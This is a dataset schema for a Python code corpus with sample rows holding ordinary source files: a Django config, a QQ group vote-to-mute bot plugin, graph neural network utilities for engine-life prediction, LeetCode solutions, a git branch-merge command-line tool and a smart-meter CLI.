Dataset schema (one row per source file; ranges are the observed min – max, "⌀" marks nullable columns):

| column | type | observed range / distinct values |
|---|---|---|
| repo_name | string | lengths 7 – 111 |
| __id__ | int64 | 16.6k – 19,705B |
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | lengths 5 – 151 |
| content_id | string | length 40 |
| detected_licenses | list | |
| license_type | string | 2 classes |
| repo_url | string | lengths 26 – 130 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | lengths 4 – 42 |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64, ⌀ | 14.6k – 687M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 12 classes |
| gha_fork | bool | 2 classes |
| gha_event_created_at | timestamp[ns] | |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_size | int64, ⌀ | 0 – 10.2M |
| gha_stargazers_count | int32, ⌀ | 0 – 178k |
| gha_forks_count | int32, ⌀ | 0 – 88.9k |
| gha_open_issues_count | int32, ⌀ | 0 – 2.72k |
| gha_language | string, ⌀ | lengths 1 – 16 |
| gha_archived | bool | 1 class |
| gha_disabled | bool | 1 class |
| content | string | lengths 10 – 2.95M |
| src_encoding | string | 5 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 10 – 2.95M |
| extension | string | 19 classes |
| num_repo_files | int64 | 1 – 202k |
| filename | string | lengths 4 – 112 |
| num_lang_files | int64 | 1 – 202k |
| alphanum_fraction | float64 | 0.26 – 0.89 |
| alpha_fraction | float64 | 0.2 – 0.89 |
| hex_fraction | float64 | 0 – 0.09 |
| num_lines | int32 | 1 – 93.6k |
| avg_line_length | float64 | 4.57 – 103 |
| max_line_length | int64 | 7 – 931 |

Sample rows follow, pipe-delimited in the column order above, with the `content` field inlined:
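A minimal loading sketch for rows in this schema; it assumes the split has been exported to a local Parquet file (the filename `train.parquet` is a placeholder) and uses the `permissive` / `no_license` class values visible in the sample rows:

```python
# Minimal inspection sketch; the Parquet filename is hypothetical.
import pandas as pd

df = pd.read_parquet("train.parquet")

# Keep small, permissively licensed, hand-written Python files,
# using only columns from the schema above.
mask = (
    (df["license_type"] == "permissive")
    & ~df["is_vendor"]
    & ~df["is_generated"]
    & (df["length_bytes"] < 50_000)
)
for _, row in df[mask].head(3).iterrows():
    print(row["repo_name"], row["path"], row["num_lines"], sep="\t")
```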
kolodnikovm/django | 16,552,803,969,138 | 9159a387e2d994021ffb81d2dfbd4eecc1ad9cbb | 4236f19ced3a54e397803bed055c25d913a63c5e | /appdir/photogal/__init__.py | 49a85de60e561d5849e5584f6dc3080d365aa01c | []
| no_license | https://github.com/kolodnikovm/django | 70c2512d79ae89a03d9b4362e7c55ea7440cb3b6 | 30d65d85190bba8d7c43334a00a213ce90ca8233 | refs/heads/master | 2021-09-11T05:54:29.070754 | 2018-01-25T11:38:49 | 2018-01-25T11:38:49 | 115,706,950 | 0 | 0 | null | false | 2018-02-26T10:38:21 | 2017-12-29T09:08:53 | 2018-01-20T14:45:19 | 2018-02-26T10:36:11 | 7,285 | 0 | 0 | 3 | Python | false | null | default_app_config = 'photogal.apps.PhotogalConfig' | UTF-8 | Python | false | false | 51 | py | 21 | __init__.py | 14 | 0.823529 | 0.823529 | 0 | 1 | 51 | 51 |
Yuandiaodiaodiao/toolman | 532,575,950,290 | 3bde0c7b265653ea221f539d7731ae89fb72fea6 | 6fac6f096812ba0b38dace94e894b96318767b4b | /botCore/plugins/voteBan.py | 17cc3e2ae0b72c0f5623935855b0f68eb4167b8b | []
| no_license | https://github.com/Yuandiaodiaodiao/toolman | fa3d8c61abc332eb1781bff63823609905c0e9da | a268f018d28236c04ccca1f84803888baeffc1bf | refs/heads/master | 2020-09-11T04:13:22.363883 | 2020-07-24T09:05:20 | 2020-07-24T09:05:20 | 221,935,488 | 9 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import aiohttp
from nonebot.message import Message, MessageSegment
import nonebot
from nonebot import on_command, CommandSession, CQHttpError  # CQHttpError is caught in the handlers below
from nonebot.natural_language import on_natural_language, NLPSession, NLPResult, IntentCommand
from nonebot.permission import *
banList = {}
banConfig = {
'967636480': 3
}
@on_natural_language(keywords={'投票禁言'})
async def _(session: NLPSession):
return IntentCommand(50.0, ('投票禁言',), None)
@on_command('投票禁言', permission=GROUP | DISCUSS)
async def banVote(session: CommandSession):
banQQ = None
for x in session.ctx['message']:
if x.type == 'at':
banQQ = x.data['qq']
if banQQ is None:
return
groupId = session.ctx['group_id']
if banList.get(groupId) is None:
banList[groupId] = {}
groupBanList = banList[groupId]
if groupBanList.get(banQQ) is None:
groupBanList[banQQ] = []
usrId = session.ctx.get('user_id')
if usrId not in groupBanList[banQQ]:
groupBanList[banQQ].append(usrId)
limit = banConfig.get(str(groupId))
bot = nonebot.get_bot()
if limit is None:
try:
info = await bot.get_group_info(group_id=groupId)
limit = info.get('member_count') // 3
        except CQHttpError:
            return
msg = Message()
try:
info = await bot.get_group_member_info(group_id=groupId, user_id=banQQ)
    except CQHttpError:
        return
msg.extend(f"投票对{info.get('nickname')}的禁言{len(groupBanList[banQQ])}/{limit}")
await session.send(msg)
if len(groupBanList[banQQ]) >= limit:
try:
info = await bot.set_group_ban(group_id=groupId, user_id=banQQ, duration=60 * limit)
groupBanList[banQQ] = None
        except CQHttpError:
            return
| UTF-8 | Python | false | false | 1,964 | py | 42 | voteBan.py | 34 | 0.599066 | 0.590768 | 0 | 60 | 31.133333 | 100 |
zhwdzh/Graph-WaveNet-RUL | 11,364,483,475,520 | 1ab207f7a4b48b64c71759e36e1f10ce27859898 | 0eee776169885dde972193066e97cbe037a063b9 | /util.py | 51408b3f41975925ec65efe96771041a9e834b55 | []
| no_license | https://github.com/zhwdzh/Graph-WaveNet-RUL | 8b46b2f31a4670c6d2f057b2eab70f06525c8847 | 30d971e06e57289148121303ae61849b0ea34ab5 | refs/heads/master | 2022-04-05T08:59:25.897413 | 2020-02-13T05:49:14 | 2020-02-13T05:49:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pickle
import numpy as np
import os
import scipy.sparse as sp
import torch
from scipy.sparse import linalg
from cmapssdata import CMAPSSDataset
class DataLoader(object):
def __init__(self, xs, ys, batch_size, pad_with_last_sample=True):
"""
:param xs:
:param ys:
:param batch_size:
:param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.
"""
self.batch_size = batch_size
self.current_ind = 0
size = len(xs)
self.num_batch = int(size // self.batch_size)
self.size = self.batch_size*self.num_batch
self.xs = xs[:self.size,...]
self.ys = ys[:self.size,...]
def shuffle(self):
permutation = np.random.permutation(self.size)
xs, ys = self.xs[permutation], self.ys[permutation]
self.xs = xs
self.ys = ys
def get_iterator(self):
self.current_ind = 0
def _wrapper():
while self.current_ind < self.num_batch:
start_ind = self.batch_size * self.current_ind
end_ind = min(self.size, self.batch_size * (self.current_ind + 1))
x_i = self.xs[start_ind: end_ind, ...]
y_i = self.ys[start_ind: end_ind, ...]
yield (x_i, y_i)
self.current_ind += 1
return _wrapper()
class StandardScaler():
"""
Standard the input
"""
def __init__(self, mean, std):
self.mean = mean
self.std = std
def transform(self, data):
return (data - self.mean) / self.std
def inverse_transform(self, data):
return (data * self.std) + self.mean
def sym_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).astype(np.float32).todense()
def asym_adj(adj):
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1)).flatten()
d_inv = np.power(rowsum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat= sp.diags(d_inv)
return d_mat.dot(adj).astype(np.float32).todense()
def calculate_normalized_laplacian(adj):
"""
# L = D^-1/2 (D-A) D^-1/2 = I - D^-1/2 A D^-1/2
# D = diag(A 1)
:param adj:
:return:
"""
adj = sp.coo_matrix(adj)
d = np.array(abs(adj).sum(1))
d_inv_sqrt = np.power(d, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
normalized_laplacian = sp.eye(adj.shape[0]) - adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
return normalized_laplacian
def calculate_scaled_laplacian(adj_mx, lambda_max=2, undirected=True):
if undirected:
adj_mx = np.maximum.reduce([adj_mx, adj_mx.T])
L = calculate_normalized_laplacian(adj_mx)
if lambda_max is None:
lambda_max, _ = linalg.eigsh(L, 1, which='LM')
lambda_max = lambda_max[0]
L = sp.csr_matrix(L)
M, _ = L.shape
I = sp.identity(M, format='csr', dtype=L.dtype)
L = (2 / lambda_max * L) - I
return L.astype(np.float32).todense()
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
def load_adj(adj_mx, adjtype):
#sensor_ids, sensor_id_to_ind, adj_mx = load_pickle(pkl_filename)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
#return sensor_ids, sensor_id_to_ind, adj
return adj
def load_dataset(fd_number, batch_size, sequence_length, normalized_k, adjtype):
datasets = CMAPSSDataset(fd_number, batch_size, sequence_length, normalized_k)
train_data = datasets.get_train_data()
test_data = datasets.get_test_data()
x = np.concatenate([datasets.get_feature_slice(train_data), datasets.get_feature_slice(test_data)], axis=0)
y = np.concatenate([datasets.get_label_slice(train_data), datasets.get_label_slice(test_data)], axis=0)
x = np.expand_dims(x, axis=-1)
adj_mx = datasets.get_adj()
adj_mx = np.exp(adj_mx)
num_samples = x.shape[0]
num_test = round(num_samples * 0.2)
num_train = round(num_samples * 0.7)
num_val = num_samples - num_test - num_train
data = {}
data['x_train'], data['y_train'] = x[:num_train], y[:num_train]
data['x_val'], data['y_val'] = (
x[num_train: num_train + num_val],
y[num_train: num_train + num_val],
)
data['x_test'], data['y_test'] = x[-num_test:], y[-num_test:]
data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size)
data['val_loader'] = DataLoader(data['x_val'], data['y_val'], batch_size)
data['test_loader'] = DataLoader(data['x_test'], data['y_test'], batch_size)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
return data, adj
def masked_mse(preds, labels):
loss = (preds-labels)**2
return torch.mean(loss)
def masked_rmse(preds, labels):
return torch.sqrt(masked_mse(preds=preds, labels=labels))
def masked_mae(preds, labels):
loss = torch.abs(preds-labels)
return torch.mean(loss)
def masked_mape(preds, labels):
loss = torch.abs(preds-labels)/labels
return torch.mean(loss)
def score(preds, labels):
d = labels - preds
for index,m in enumerate(d):
if (m>=0):
d[index]=m/10
#dp.append(m/10)
else:
d[index]=-m/13
#dp.append(-m/13)
return torch.mean(torch.exp(d) - 1)
def metric(pred, real):
    mae = masked_mae(pred, real).item()
    #mape = masked_mape(pred, real).item()
    rmse = masked_rmse(pred, real).item()
    # Assigning to a local named `score` would shadow the function above and
    # raise UnboundLocalError, so use a distinct name here.
    rul_score = score(pred, real).item()
    return mae, rmse, rul_score
| UTF-8 | Python | false | false | 7,184 | py | 3 | util.py | 3 | 0.596464 | 0.587138 | 0 | 216 | 32.25 | 113 |
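A toy sanity check of the asymmetric `score` above (a sketch, with `torch` as the only dependency). Note the sign convention: with `d = labels - preds`, an under-estimate falls on the harsher `exp(d/10)` branch and an over-estimate on the milder `exp(-d/13)` branch:

```python
# Toy check: a miss of 10 cycles is penalised differently by sign.
import torch

labels = torch.tensor([110.0, 90.0])
preds = torch.tensor([100.0, 100.0])    # 10 under, 10 over

d = labels - preds                      # tensor([ 10., -10.])
under = torch.exp(d[0] / 10) - 1        # e**1.000 - 1 ~= 1.718
over = torch.exp(-d[1] / 13) - 1        # e**0.769 - 1 ~= 1.158
print(under.item(), over.item())
print(score(preds, labels).item())      # mean of the two penalties ~= 1.438
```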
ganhan999/ForLeetcode | 11,613,591,586,913 | 1251fdd8040010169e97a3232704c814db865898 | 3ba2d4091332b9d0a2b053f15a4d4ce4ae1c1ef0 | /108、将有序数组转换为二叉搜索树.py | 172c2b4da8e58cc8b27e5b4b94b058a2b9fca913 | []
| no_license | https://github.com/ganhan999/ForLeetcode | 126272d34250035abda6c2d67222c2c186a3f80b | 9980a9e4bf448b2cf3fed98891a54b6d202a64db | refs/heads/master | 2023-05-01T14:21:49.883692 | 2021-05-12T08:59:51 | 2021-05-12T08:59:51 | 348,708,572 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。
本题中,一个高度平衡二叉树是指一个二叉树每个节点的左右两个子树的高度差的绝对值不超过 1。
示例:
给定有序数组: [-10,-3,0,5,9],
一个可能的答案是:[0,-3,9,-10,null,5],它可以表示下面这个高度平衡二叉搜索树:
0
/ \
-3 9
/ /
-10 5
"""
"""
思路分析:
DFS,递归,用二分的思想。
"""
#我的做法
class Solution:
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
maxlength=len(nums)
def DFS(left,right):
if left>right:
return
mid=(left+right)//2
root=TreeNode(nums[mid])
root.left=DFS(left,mid-1)
root.right=DFS(mid+1, right)
return root
return DFS(0, maxlength-1)
| UTF-8 | Python | false | false | 904 | py | 184 | 108、将有序数组转换为二叉搜索树.py | 184 | 0.543478 | 0.506211 | 0 | 36 | 16.75 | 60 |
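A small harness for the solution above (hedged: `TreeNode` and `List` are normally supplied by the LeetCode judge, so they are declared here only to make the check runnable, assuming the `Solution` class above is in scope):

```python
# Self-contained check: rebuild the example and verify the
# height-balance invariant from the problem statement.
from typing import Optional

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def height(node: Optional[TreeNode]) -> int:
    return 0 if node is None else 1 + max(height(node.left), height(node.right))

def is_balanced(node: Optional[TreeNode]) -> bool:
    if node is None:
        return True
    return (abs(height(node.left) - height(node.right)) <= 1
            and is_balanced(node.left) and is_balanced(node.right))

root = Solution().sortedArrayToBST([-10, -3, 0, 5, 9])
print(root.val, is_balanced(root))   # 0 True  (one valid answer)
```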
dheerajgoudb/Big-Data | 10,127,532,907,127 | 3c5086a26da1d751928c35bd9a22fea0f43f081e | 7904fb38c7e9f930bef0a1b1899b24e800491873 | /Assignment4/Part2/Section2.py | 86ff4eb61e1f98aa7f8c4442da6a4a3988dc0da5 | []
| no_license | https://github.com/dheerajgoudb/Big-Data | d14ac621cc8be6949537166e204769dabead2891 | 7bfc21fa351307bdb3ea162acab76b6143c9c3d5 | refs/heads/master | 2021-01-23T04:19:46.950833 | 2018-11-22T04:14:14 | 2018-11-22T04:14:14 | 86,184,975 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC ### ***PART-III (Section 2: Clustering)***
# MAGIC In this section, we cluster the dataset into K clusters using the K-Means algorithm.
# COMMAND ----------
# MAGIC %md
# MAGIC ##### ***User Knowledge Modeling Data Set***
# MAGIC Abstract: It is the real dataset about the students' knowledge status about the subject of Electrical DC Machines. http://archive.ics.uci.edu/ml/datasets/User+Knowledge+Modeling
# COMMAND ----------
students = sc.textFile("/FileStore/tables/6rsya5vv1490134063282/StudentKnowledgeData.csv")
# COMMAND ----------
# In the file loaded above, the first row contains the column names; we remove it before parsing the dataset
colNames = students.first()
studentsRDD = students.filter(lambda x: x != colNames).map(lambda line: [float(i) for i in line.split(',')])
print 'Number of Rows: %s' %studentsRDD.count()
print 'First two rows: %s' %studentsRDD.take(2)
# COMMAND ----------
#Now we will load the packages
from pyspark.mllib.clustering import KMeans, KMeansModel
from numpy import array
from math import sqrt
#Build the model
clusters = KMeans.train(studentsRDD, 4, maxIterations = 10,initializationMode = "random")
#calculating sum of squared errors
def error(point):
center = clusters.centers[clusters.predict(point)]
return sqrt(sum([x**2 for x in (point - center)]))
WSSSE = studentsRDD.map(lambda point: error(point)).reduce(lambda x, y: x + y)
print("Sum of Squared Error = " + str(WSSSE))
# COMMAND ----------
# Now compute the Sum of Squared Errors for different values of k
# (an elbow-style comparison; error() reads the rebound global `clusters`)
for k in range(1, 5):
  clusters = KMeans.train(studentsRDD, k, maxIterations = 10, initializationMode = "random")
  WSSSE = studentsRDD.map(lambda point: error(point)).reduce(lambda x, y: x + y)
  print("Sum of Squared Error for k = " + str(k) + ": " + str(WSSSE))
| UTF-8 | Python | false | false | 1,878 | py | 14 | Section2.py | 5 | 0.715655 | 0.702343 | 0 | 48 | 38.125 | 185 |
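A follow-up sketch for picking k: compare how much WSSSE drops between successive values (the classic elbow heuristic). It reuses the `error()` helper above, which reads the global `clusters`:

```python
# Sketch: the "elbow" is where the WSSSE drop between k and k+1 levels off.
wssse = []
for k in range(1, 8):
    clusters = KMeans.train(studentsRDD, k, maxIterations=10, initializationMode="random")
    wssse.append(studentsRDD.map(lambda point: error(point)).reduce(lambda x, y: x + y))
for k in range(1, 7):
    print("drop from k=" + str(k) + " to k=" + str(k + 1) + ": " + str(wssse[k - 1] - wssse[k]))
```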
oscm/devops | 386,547,100,759 | 3183cabf8efe4e649566d38469d1c9900a6a3fcc | 3519864c86fbf9de185c74e42fc37404dc0491ee | /bin/merge | 4f98e51b7deccc127111203064fbb69a350991e8 | ["MIT"] | permissive | https://github.com/oscm/devops | 21acdeb46619ac5a9c01c58762716037cf5b7c9f | 012eb08eceefa500e40d7fedf63f25ef858474ed | refs/heads/master | 2022-08-22T16:24:11.371104 | 2022-08-22T03:38:23 | 2022-08-22T03:38:23 | 18,361,108 | 26 | 22 | null | true | 2015-03-03T09:50:16 | 2014-04-02T09:24:39 | 2015-02-04T08:13:02 | 2015-03-03T09:50:16 | 539 | 2 | 3 | 0 | Python | null | null |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
###################################
# git branch merge
# Author: netkiller@msn.com
# Home: http://www.netkiller.cn
###################################
try:
import os,io,sys,subprocess
import logging, configparser
from logging import getLogger
# import threading
from optparse import OptionParser, OptionGroup
# import time
# from datetime import datetime
module = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,module)
from netkiller.git import *
except ImportError as err:
print("Error: %s" %(err))
class Merge():
def __init__(self):
self.workspace = None
usage = "usage: %prog [options] <parameter>"
self.parser = OptionParser(usage)
        # default must be None (not the string 'None'), otherwise the workspace branch in main() is always taken
        self.parser.add_option('-w','--workspace', dest='workspace', help='workspace ~/workspace', default=None, metavar='~/workspace')
self.parser.add_option('-p','--project', dest='project', help='project directory', default=None, metavar='')
self.parser.add_option('-l','--logfile', dest='logfile', help='log file', default='/tmp/merge.log', metavar='/tmp/merge.log')
self.parser.add_option('-d', '--debug', dest='debug', action='store_true', help="debug")
group = OptionGroup(self.parser, "Repository")
group.add_option('-c','--clone', dest='clone', help='clone branch', default=None, metavar='')
group.add_option('-r','--reset', dest='reset', help='Reset current HEAD to the specified state', default=None, metavar='8547cb94')
group.add_option('-b','--checkout', dest='checkout', help='checkout branch', default=None, metavar='master')
self.parser.add_option_group(group)
group = OptionGroup(self.parser, "Custom merge branch")
group.add_option('-s', '--source', dest='source', help='source', default=None, metavar='development')
group.add_option('-t','--to', dest='target', help='target', default=None, metavar='testing')
        self.parser.add_option_group(group)
group = OptionGroup(self.parser, "Workflow merge development -> testing -> staging -> production(master)")
group.add_option('', '--testing', dest='testing', action='store_true', default = False, help="from development to testing")
group.add_option('', '--staging', dest='staging', action='store_true', default = False, help="from testing to staging")
group.add_option('', '--production', dest='production', action='store_true', default = False, help="from staging to production(master)")
self.parser.add_option_group(group)
group = OptionGroup(self.parser, "Create branch")
group.add_option('-B','--branch', dest='branch', help='create custom branch', default=None, metavar='mybranch')
group.add_option('-f','--feature', dest='feature', help='feature branch from development', default=None, metavar='feature/0001')
group.add_option('-H','--hotfix', dest='hotfix', help='hotfix branch from master', default=None, metavar='hotfix/0001')
self.parser.add_option_group(group)
(self.options, self.args) = self.parser.parse_args()
try:
if self.options.debug :
print(self.options, self.args)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
elif self.options.logfile :
logging.basicConfig(level=logging.NOTSET, format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S', filename=self.options.logfile, filemode='a')
except Exception as err:
print("Error: %s" %(err))
sys.exit(2)
self.logger = getLogger(__name__)
def usage(self):
print("Netkiller git administrator")
self.parser.print_help()
print("\nHomepage: http://www.netkiller.cn\tAuthor: Neo <netkiller@msn.com>")
exit()
def branch(self, name):
git = GitBranch(self.project,self.logger)
if len(self.args) == 1 :
git.create(name, self.args[0])
else:
git.create(name)
git.list()
git.debug()
git.execute()
def feature(self,name = None):
git = GitBranch(self.project,self.logger)
if name :
git.create('feature/%s' % name)
else:
git.create('feature')
git.list()
git.debug()
git.execute()
def hotfix(self,name = None):
git = GitBranch(self.project,self.logger)
if name :
git.create('hotfix/%s' % name)
else:
git.create('hotfix')
git.list()
git.debug()
git.execute()
def clone(self,url):
git = Git(self.workspace, self.logger)
git.clone(url)
git.execute()
def merge(self, source, target):
git = GitMerge(self.project,self.logger)
git.source(source).target(target).merge().push()
git.execute()
def checkout(self, branch):
git = GitCheckout(self.project,self.logger)
git.checkout(branch).pull().execute()
def reset(self, ver):
git = GitReset(self.project,self.logger)
git.hard(ver).push(True).execute()
def main(self):
if self.options.workspace :
self.workspace = self.options.workspace
        if self.options.project :
            if self.workspace :
                # join the workspace with the option value; self.project is
                # not yet defined at this point
                self.project = self.workspace + '/' + self.options.project
            else:
                self.project = self.options.project
else:
self.project = os.getcwd()
if self.options.clone :
self.clone(self.options.clone)
exit()
if self.options.checkout :
self.checkout(self.options.checkout)
if self.options.reset :
self.reset(self.options.reset)
if self.options.branch :
self.branch(self.options.branch)
elif self.options.feature :
self.feature(self.options.feature)
elif self.options.hotfix :
self.hotfix(self.options.hotfix)
if self.options.source and self.options.target :
self.merge(self.options.source, self.options.target)
if self.options.testing :
self.merge('development', 'testing')
elif self.options.staging :
self.merge('testing', 'staging')
elif self.options.production :
self.merge('staging', 'master')
pass
self.logger.info('-' * 50)
if __name__ == '__main__':
try:
merge = Merge()
merge.main()
except KeyboardInterrupt:
print ("Crtl+C Pressed. Shutting down.") | UTF-8 | Python | false | false | 5,901 | 195 | merge | 94 | 0.677851 | 0.673784 | 0 | 162 | 35.432099 | 169 |
|
jimmy623/LeetCode | 85,899,380,808 | 88638b0a0aa2e66daf392c252780daf397925ecb | ac47f86e4fbd46c641575b2a8ccc401fd70c98e9 | /Solutions/Reverse Nodes in k-Group.py | 6e4a3248666245684319cfca8be503642a0f5033 | []
| no_license | https://github.com/jimmy623/LeetCode | 0a19f6e32c29e087e2d808153cb7a6e3794e2b67 | c4c1838bcde53484d3df654714bbbf6589c03c37 | refs/heads/master | 2021-07-12T06:02:14.973878 | 2021-03-14T16:03:26 | 2021-03-14T16:03:26 | 25,859,418 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __repr__(self):
string = "val:" + str(self.val) + " next:"
if self.next == None:
string += "None"
else:
string += str(self.next.val)
return string
def printList(head):
print "print list"
string = ""
while head != None:
string += str(head.val)+"->"
head = head.next
string = string[:-2]
print string
class Solution:
# @param head, a ListNode
# @param k, an integer
# @return a ListNode
def reverseKGroup(self, head, k):
if head == None:
return head
remains = True
last = None
point = head
while remains:
nodes = []
for i in range(k):
nodes.append(point)
if point.next == None:
remains = False
break
point = point.next
if len(nodes) != k:
break
if point == None:
remains = False
nodes[0].next = None
else:
nodes[0].next = nodes[k-1].next
for i in range(k-1,0,-1):
nodes[i].next = nodes[i-1]
if last == None:
head = nodes[k-1]
else:
last.next = nodes[k-1]
last = nodes[0]
point = last.next
return head
a = ListNode(1)
b = ListNode(2)
c = ListNode(3)
d = ListNode(4)
e = ListNode(5)
a.next = b
b.next = c
c.next = d
d.next = e
s = Solution()
result = s.reverseKGroup(a,3)
printList(result)
#https://oj.leetcode.com/problems/reverse-nodes-in-k-group/
#Reverse Nodes in k-Group | UTF-8 | Python | false | false | 1,827 | py | 317 | Reverse Nodes in k-Group.py | 316 | 0.472359 | 0.463054 | 0 | 88 | 19.772727 | 59 |
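For reference, the driver above builds 1→2→3→4→5 and reverses it in groups of k=3; tracing `printList` gives:

```
print list
3->2->1->4->5
```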
HeftyB/code-challenge | 7,129,645,721,015 | 978ba9dc15a409864713a72e77538d1ffe0fb331 | 152243a8a816f588c1a59c4fd92493c0f7736f3b | /queue-using-stacks/queue-using-stacks.py | 3aa90808299f3897282944ca67551cd03dca9faa | ["MIT"] | permissive | https://github.com/HeftyB/code-challenge | 442de7adddd00c3dbefadb919e567aa56f5dc5b6 | e23d9182f1da9bbd9bf3d2d97a22652513ec1b7d | refs/heads/master | 2023-05-01T17:16:24.294954 | 2021-05-20T02:16:34 | 2021-05-20T02:16:34 | 297,471,495 | 0 | 0 | MIT | false | 2021-01-29T04:54:26 | 2020-09-21T22:04:56 | 2021-01-27T04:59:17 | 2021-01-29T04:54:26 | 68 | 0 | 0 | 0 | Python | false | false |
"""
Implement the following operations of a queue using stacks.
push(x) -- Push element x to the back of queue.
pop() -- Removes the element from in front of queue.
peek() -- Get the front element.
empty() -- Return whether the queue is empty.
Example:
MyQueue queue = new MyQueue();
queue.push(1);
queue.push(2);
queue.peek(); // returns 1
queue.pop(); // returns 1
queue.empty(); // returns false
"""
# SOLUTION 1
# Use a Python list as the queue container:
#   push  - append to the end of the list
#   pop   - remove and return the element at index 0 (the front of the queue)
#   peek  - return the value at index 0
#   empty - return True if the list is empty
# (The two-stack rotation originally described here, where push drains the
# stack into a temporary stack and back, is sketched after this snippet.)
class MyQueue:
def __init__(self):
self.stack = []
def push(self, x: int) -> None:
self.stack.append(x)
return self.stack
def pop(self) -> int:
return self.stack.pop(0)
def peek(self) -> int:
return self.stack[0]
def empty(self) -> bool:
if len(self.stack) > 0:
return False
else:
return True
| UTF-8 | Python | false | false | 1,200 | py | 42 | queue-using-stacks.py | 36 | 0.611667 | 0.6025 | 0 | 56 | 20.285714 | 66 |
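The SOLUTION 1 comment mentions a two-stack rotation on push, while the class above takes a shortcut with `pop(0)`. A sketch of the rotation variant, using only stack operations (`append`/`pop`):

```python
# Two-stack rotation: each push drains the stack into a helper, places the
# new element at the bottom, then restores order, so pop()/peek() touch
# only the top of the stack.
class MyQueueTwoStacks:
    def __init__(self):
        self.stack = []

    def push(self, x: int) -> None:
        temp = []
        while self.stack:            # pop everything onto the helper stack
            temp.append(self.stack.pop())
        self.stack.append(x)         # new element ends up at the bottom
        while temp:                  # restore the original order on top
            self.stack.append(temp.pop())

    def pop(self) -> int:
        return self.stack.pop()      # front of the queue is now on top

    def peek(self) -> int:
        return self.stack[-1]

    def empty(self) -> bool:
        return not self.stack
```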
nrocco/smeterd | 2,284,922,630,860 | 2a760a551a64b0c36530ae4508038503b836a29c | 815cbff2d660a04880be8ead0becfe5e20b30fbb | /smeterd/cli/__init__.py | 83ad8783824275d44d7f61c9a456281cf53c913f | ["MIT"] | permissive | https://github.com/nrocco/smeterd | e697721b31de9b18e2be782e986de607c82759d5 | d0f6b5f5028bb0cd3ee7fedbe5c5753cfc8394cb | refs/heads/master | 2023-03-12T08:29:47.689970 | 2023-03-02T11:35:42 | 2023-03-02T11:35:42 | 9,798,114 | 40 | 19 | MIT | false | 2023-03-02T11:35:43 | 2013-05-01T19:11:22 | 2023-01-27T08:10:43 | 2023-03-02T11:35:42 | 362 | 31 | 19 | 3 | Python | false | false |
import click
import logging
from smeterd import __version__
from .read_meter import read_meter
logging.basicConfig(format='[%(asctime)-15s] %(levelname)s %(message)s')
@click.group()
@click.version_option(version=__version__)
def cli():
"""Read smart meter P1 packets"""
pass
cli.add_command(read_meter)
| UTF-8 | Python | false | false | 319 | py | 17 | __init__.py | 10 | 0.705329 | 0.695925 | 0 | 18 | 16.722222 | 72 |
